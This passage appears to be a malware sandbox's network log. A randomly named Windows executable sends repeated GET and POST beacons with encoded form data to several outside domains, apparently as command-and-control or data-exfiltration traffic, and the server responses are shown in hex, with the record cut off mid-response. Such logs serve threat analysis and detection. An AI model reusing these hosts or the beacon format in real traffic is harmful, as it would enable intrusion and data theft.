QtKtUpvP=8gHotV00muxVff0w2ZDRuShiV0v6qCdgmzBeMT/h3hljwmwlhrGGeXhUnf5JTtNIeZImS21DK39UpboneOXy5wMHcqE6DsByg74kx54AxlasamaiwQ2+aNtilHM2K4JHuZGKjTwNigYw8QPiK+YxbmGf8Eq5h54x9DMP9KEpLa7RupdsN9TlA0sAN/FFA2TAYeek8jjwFJtJ0q0Jhg4FmnuXjVSisRt2bAYaD6d9KJBk9QFH0Yz4gTLc35SStLF24kXOcJJA2XDdFcY44e8niNG+Wr1aGvw15Za/FKsGhDwJSRIv4U3Ob6MztoZxeLSl9rlN61RDfx+Q5JdCrQhH230x22bE6V+i146TvqPt9YOx0abyU5AigJlGV9dDrQ09V+wjtYzzOoj12fcc3aO8uLqQv1LBrajm1EHx/zQwMQN2U+9mhM/eyFCHp6RYP51tx/wmnM4A2lVrxmJygSl054zLOwK6jfzExjjcOzS4xFyU7ThHl4kqNUFTWSfWIvrlgWQrqMDqom29L4EJGuKA8ksz8BHMUdL5ge1PuU0nMjj+sj1xveLYSodSjoA1HKfzrjl4H4kn6qvMNtRQBbbtwrkQwodxqwdBRnkbONXqys1YSgRb5tGTKs2E0oxMQdnwFovjhdmctUiTegrGYXOJzF22oqw0VUUWNcpucVop+dIzV95zEZDFdppAkNQpfyH5keqN0hBHoqWyLA3bQRzue4fP6fO7WX9jb/KdkKO+KsN5BAEuLH5XyQmZfDRJOTQLeWAYRlBnKiA3OK4/ctAXJdppilUP7Ubxe8k2r0IO8fKvJwxaYFq5nG7FG10bEvkwL3U6aCtalYcBxEL/+swlbQUY9Ne8YSzRrCaJse0ZPy/Bj+YjevxasCPImI/M3w2VoQEuSzM9PTkdWHKucX73b8tucYM4HziYJXzBEoBfOEYumtueGGZZmH57N4QnRQ1kbAi2yZ8EzRlYK2Ft/C1+R/6Lr7PN4jRrCs5bPAWgNgw [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50006	118.107.250.103	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:54.391279936 CET	505	OUT	GET /gxyh/?QtKtUpvP=xivIugper8hSVuoN4YvDvis0ACu7xzkGnAUBMzrp/j5qvAoCvNj6F299r/oRQ/YEeKRSLhAnFUBxmqELIOT++SddUagkPsJGob5DgpUWzHX7f3q0+yGEQcdTuVkFKJ4g4Q==&tz=vf30S8fHB HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.zxyck.net Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Nov 29, 2024 03:54:55.941771984 CET	266	IN	HTTP/1.1 200 OK Server: Tengine Date: Fri, 29 Nov 2024 02:53:53 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 Data Raw: 31 63 0d 0a 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 7a 78 79 63 6b 2e 6e 65 74 2f 67 78 79 68 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1c/www/wwwroot/zxyck.net/gxyh.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50007	209.74.77.109	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:55:01.648066998 CET	769	OUT	POST /n9b0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.dailyfuns.info Origin: http://www.dailyfuns.info Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 209 Connection: close Referer: http://www.dailyfuns.info/n9b0/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 47 33 42 44 6c 77 34 6a 6e 4d 64 35 76 78 2b 4a 50 69 6c 69 71 64 69 39 79 59 4a 61 56 68 50 71 76 6e 62 41 79 4f 78 7a 72 58 32 56 69 37 59 5a 69 59 47 39 33 6d 6b 4b 44 4b 69 6c 50 4c 41 68 4f 69 2b 36 34 34 41 36 63 42 30 57 45 57 70 6f 68 6d 34 6d 4e 77 65 64 64 47 74 6c 46 38 5a 62 55 65 50 4b 38 75 33 74 31 54 71 76 36 65 48 6d 45 76 65 6f 6f 77 76 48 46 4e 32 39 34 4e 54 75 61 35 76 37 6a 54 6f 46 4e 77 6d 72 34 73 67 6e 77 4c 75 36 64 37 31 6f 4f 47 77 2b 54 39 76 4a 59 5a 68 37 59 67 59 50 6d 67 37 57 78 37 31 52 79 65 51 76 43 6f 78 4d 47 55 3d Data Ascii: QtKtUpvP=N+9LpEXYE/G8IG3BDlw4jnMd5vx+JPiliqdi9yYJaVhPqvnbAyOxzrX2Vi7YZiYG93mkKDKilPLAhOi+644A6cB0WEWpohm4mNweddGtlF8ZbUePK8u3t1Tqv6eHmEveoowvHFN294NTua5v7jToFNwmr4sgnwLu6d71oOGw+T9vJYZh7YgYPmg7Wx71RyeQvCoxMGU=
Nov 29, 2024 03:55:02.908226967 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 02:55:02 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50008	209.74.77.109	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:55:04.301853895 CET	789	OUT	POST /n9b0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.dailyfuns.info Origin: http://www.dailyfuns.info Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 229 Connection: close Referer: http://www.dailyfuns.info/n9b0/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 6d 6e 42 41 43 6b 34 30 58 4d 65 33 50 78 2b 51 66 69 68 69 71 68 69 39 33 35 53 61 6e 46 50 71 50 58 62 53 48 75 78 79 72 58 32 64 43 37 64 55 43 59 5a 39 32 62 48 4b 44 47 69 6c 4f 72 41 68 4d 36 2b 36 4c 51 44 37 4d 42 32 65 6b 57 72 6d 42 6d 34 6d 4e 77 65 64 64 54 77 6c 46 6b 5a 48 31 75 50 59 75 57 34 78 46 54 72 6f 36 65 48 69 45 76 53 6f 6f 77 4a 48 42 45 5a 39 36 46 54 75 66 56 76 36 79 54 72 4d 4e 77 6b 6b 59 74 4a 33 67 32 35 67 4e 37 6a 73 2b 71 34 75 6a 4a 55 4d 75 6f 4c 68 36 6f 77 63 47 4d 44 47 69 7a 43 41 43 2f 35 31 68 34 42 53 52 44 50 47 55 4f 39 47 34 66 62 36 72 46 46 4a 57 68 7a 31 30 2b 4f Data Ascii: QtKtUpvP=N+9LpEXYE/G8ImnBACk40XMe3Px+Qfihiqhi935SanFPqPXbSHuxyrX2dC7dUCYZ92bHKDGilOrAhM6+6LQD7MB2ekWrmBm4mNweddTwlFkZH1uPYuW4xFTro6eHiEvSoowJHBEZ96FTufVv6yTrMNwkkYtJ3g25gN7js+q4ujJUMuoLh6owcGMDGizCAC/51h4BSRDPGUO9G4fb6rFFJWhz10+O
Nov 29, 2024 03:55:05.605709076 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 02:55:05 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50009	209.74.77.109	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:55:06.959697962 CET	1806	OUT	POST /n9b0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.dailyfuns.info Origin: http://www.dailyfuns.info Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Connection: close Referer: http://www.dailyfuns.info/n9b0/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 6d 6e 42 41 43 6b 34 30 58 4d 65 33 50 78 2b 51 66 69 68 69 71 68 69 39 33 35 53 61 6e 4e 50 72 2b 33 62 41 52 6d 78 78 72 58 32 54 69 37 63 55 43 5a 44 39 32 44 62 4b 43 37 56 6c 4c 76 41 68 76 79 2b 38 36 51 44 77 4d 42 32 42 55 57 71 6f 68 6d 74 6d 4e 68 32 64 64 44 77 6c 46 6b 5a 48 32 32 50 49 4d 75 34 69 56 54 71 76 36 65 4c 6d 45 75 50 6f 6f 5a 79 48 42 4a 6d 39 71 6c 54 76 2f 46 76 38 41 37 72 55 64 77 69 6a 59 74 52 33 67 37 2b 67 4e 6e 76 73 38 4c 6a 75 67 5a 55 4d 4c 4a 55 7a 71 74 72 64 57 45 45 4d 78 69 75 51 79 37 63 34 7a 6c 7a 4f 79 33 30 4a 6c 61 2b 50 66 6a 2b 38 36 4d 54 62 33 68 39 2b 69 62 45 66 57 65 53 4c 61 39 59 6a 38 68 4e 4f 6a 61 75 2f 70 57 58 6a 58 2b 48 4c 49 79 47 30 71 4d 52 56 58 6c 36 73 70 6f 2b 41 33 67 4d 39 71 73 50 67 7a 59 69 4f 73 73 43 2f 34 73 36 68 50 6b 31 6d 65 45 55 45 31 66 4a 41 6a 41 47 6e 66 2f 56 58 50 41 2f 6e 50 79 6a 4a 6a 35 4d 6d 59 46 31 53 6c 70 7a 74 45 38 49 34 78 56 53 62 [TRUNCATED] Data Ascii: QtKtUpvP=N+9LpEXYE/G8ImnBACk40XMe3Px+Qfihiqhi935SanNPr+3bARmxxrX2Ti7cUCZD92DbKC7VlLvAhvy+86QDwMB2BUWqohmtmNh2ddDwlFkZH22PIMu4iVTqv6eLmEuPooZyHBJm9qlTv/Fv8A7rUdwijYtR3g7+gNnvs8LjugZUMLJUzqtrdWEEMxiuQy7c4zlzOy30Jla+Pfj+86MTb3h9+ibEfWeSLa9Yj8hNOjau/pWXjX+HLIyG0qMRVXl6spo+A3gM9qsPgzYiOssC/4s6hPk1meEUE1fJAjAGnf/VXPA/nPyjJj5MmYF1SlpztE8I4xVSb84KxCizqoeKijHzqAG8GmAfA/w/VZMQmgwKWE4SbqFXPnbI2K9IxV1OkhZyZNwkZm0ZpPvKG9KiRwqqPebjSil1SgnH9J8/UwkPSOPG+tWJ3iTQZ0mN6w4BryAV4hFRj6LMCcQ/Fs/ChHsGcX6mLDW8XEWu2+o0QJF5+J34E/Fje7edXPC7V5JEcUiY1cIZ23H6yaa4x9h9XAmySnmmtKbksDVpAulkB4ijrxoXaz8b9k3JfNlkv1LuKqRYy4EEmATkET5nlGsFj/05MNa4D+J2hV5UObU6j64IPLxwe1s8fxnzvyhhU8YRyQKr9E/Imls4H9dUP6P/J+0M/GJLYeI5YNZznTkjUpFUsH6Hu6FAxUIRztU96XJqvbhycHIX3KX2s1g9VYCXegg9MmWKz2NC3ErzbiARrFPP9pUCxf7JeaoXKNDOnlSu7PBTjDByg7Y91M/CLIWC+AKAM4vZ6M+jnT2kp01ES9NxwUH3k31euLJQm81neFwwEUDTjtVmBUpr3bvrsxuSYzF7qPlwNwU/vF4/hjRKXiMAozQ6q8tpzX9bTL+dQf8f/Yjh4MvnbTmB1ru6gIbZnfGI4d/pZTH64lFXi3YPKJQTVpETii7SGPqIHRzhbE2Q4KcQi+A/qHjODiAgm5Crt9vycLCsIErBHUv9odpte3e [TRUNCATED]
Nov 29, 2024 03:55:08.216430902 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 02:55:07 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50010	209.74.77.109	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:55:09.610085011 CET	510	OUT	GET /n9b0/?tz=vf30S8fHB&QtKtUpvP=A8VrqyfvUbO/Hw2IDw0dtkQZ0NZDVPvZj5dGp0FbdWJo87i+fAzGqY/WbkPjYDkNrmWhazG0hIjSjfnpkftd4uwKXUWjpBKipcp7aPXApUFDa1q1IM66i0qgt5iDmW/Xqw== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.dailyfuns.info Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Nov 29, 2024 03:55:10.922472000 CET	548	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 02:55:10 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50011	172.67.169.6	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:55:16.474531889 CET	778	OUT	POST /1ag2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.mydreamdeal.click Origin: http://www.mydreamdeal.click Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 209 Connection: close Referer: http://www.mydreamdeal.click/1ag2/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 42 4f 42 41 4e 70 56 62 51 4e 6d 32 67 33 54 59 38 4f 37 62 73 6f 70 79 6a 52 48 41 41 4e 65 62 54 35 33 70 58 39 77 46 76 76 31 51 53 77 56 31 6d 46 31 6b 67 37 66 46 53 47 76 6e 6d 31 47 51 46 4c 43 78 4e 62 31 71 47 34 37 59 41 44 42 38 49 54 44 49 38 71 69 4c 38 4b 36 68 34 65 59 2f 2b 68 66 72 39 6d 2b 30 45 51 51 79 64 65 77 4b 32 36 43 6f 6f 6f 63 53 75 67 33 55 7a 37 4d 79 67 4b 49 76 5a 6a 49 41 65 4b 32 63 4d 31 6c 72 68 47 76 57 42 37 42 66 77 48 6b 6d 68 50 6e 6a 79 4d 78 6f 53 58 41 49 4e 43 51 6a 69 67 79 4c 44 38 2b 44 68 38 57 63 43 35 6b 3d Data Ascii: QtKtUpvP=1XpfOM1gsz3GBOBANpVbQNm2g3TY8O7bsopyjRHAANebT53pX9wFvv1QSwV1mF1kg7fFSGvnm1GQFLCxNb1qG47YADB8ITDI8qiL8K6h4eY/+hfr9m+0EQQydewK26CooocSug3Uz7MygKIvZjIAeK2cM1lrhGvWB7BfwHkmhPnjyMxoSXAINCQjigyLD8+Dh8WcC5k=
Nov 29, 2024 03:55:17.863266945 CET	1065	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 02:55:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, no-store, must-revalidate Expires: Fri, 29 Nov 2024 02:55:17 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j74Fw6WRGVn2hnwkvFm4Is6wXjRGfo7g6k%2FY091YXhZ9kBk5%2BYHVTPJkzdYxeEV5pf73ufYJmmj1Q6691z7aA2uxIPkjVYpFpLXIO%2FMMWUEC%2BFWS3QMVB2wr2CySOQPCFnvx0cb7JGU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e9f5165bed842e3-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1790&rtt_var=895&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50012	172.67.169.6	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:55:19.152892113 CET	798	OUT	POST /1ag2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.mydreamdeal.click Origin: http://www.mydreamdeal.click Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 229 Connection: close Referer: http://www.mydreamdeal.click/1ag2/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 4f 50 52 41 49 4f 4a 62 41 64 6d 31 73 58 54 59 79 75 37 66 73 6f 6c 79 6a 51 44 51 42 2f 36 62 55 59 48 70 57 2b 6f 46 73 76 31 51 47 41 56 77 69 46 31 56 67 37 62 6e 53 48 54 6e 6d 78 57 51 46 4f 2b 78 4e 73 70 74 55 34 37 61 4c 6a 42 69 58 44 44 49 38 71 69 4c 38 4b 2b 4c 34 65 41 2f 2b 52 50 72 38 48 2b 37 4e 77 51 78 55 2b 77 4b 67 4b 44 76 6f 6f 64 46 75 68 62 74 7a 34 30 79 67 49 67 76 63 6e 55 48 51 4b 32 65 43 56 6c 2f 6d 32 53 64 44 37 5a 70 77 6e 30 67 38 2b 76 63 33 36 41 43 49 31 49 67 65 69 38 62 79 7a 36 38 53 4d 66 71 37 66 47 73 63 75 77 62 59 4e 36 48 4d 6d 48 6f 74 6d 66 6d 58 75 55 73 70 54 75 4f Data Ascii: QtKtUpvP=1XpfOM1gsz3GOPRAIOJbAdm1sXTYyu7fsolyjQDQB/6bUYHpW+oFsv1QGAVwiF1Vg7bnSHTnmxWQFO+xNsptU47aLjBiXDDI8qiL8K+L4eA/+RPr8H+7NwQxU+wKgKDvoodFuhbtz40ygIgvcnUHQK2eCVl/m2SdD7Zpwn0g8+vc36ACI1Igei8byz68SMfq7fGscuwbYN6HMmHotmfmXuUspTuO
Nov 29, 2024 03:55:20.526401043 CET	1069	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 02:55:20 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, no-store, must-revalidate Expires: Fri, 29 Nov 2024 02:55:20 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SKRb8yoGVZL23gdJNPyflO9%2BkZdPEtI5%2Bz5D%2BH3YMm80DKxfIkc%2BF%2BxOIox4wv0k64ALiM1RgqBE4UxzrejN5sQKYWAP3lg138Wua67r%2F3byZTjpiblwLPE6EDD1b6UidqQOPWOXyZM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e9f51767b2d19b2-EWR Content-Encoding: 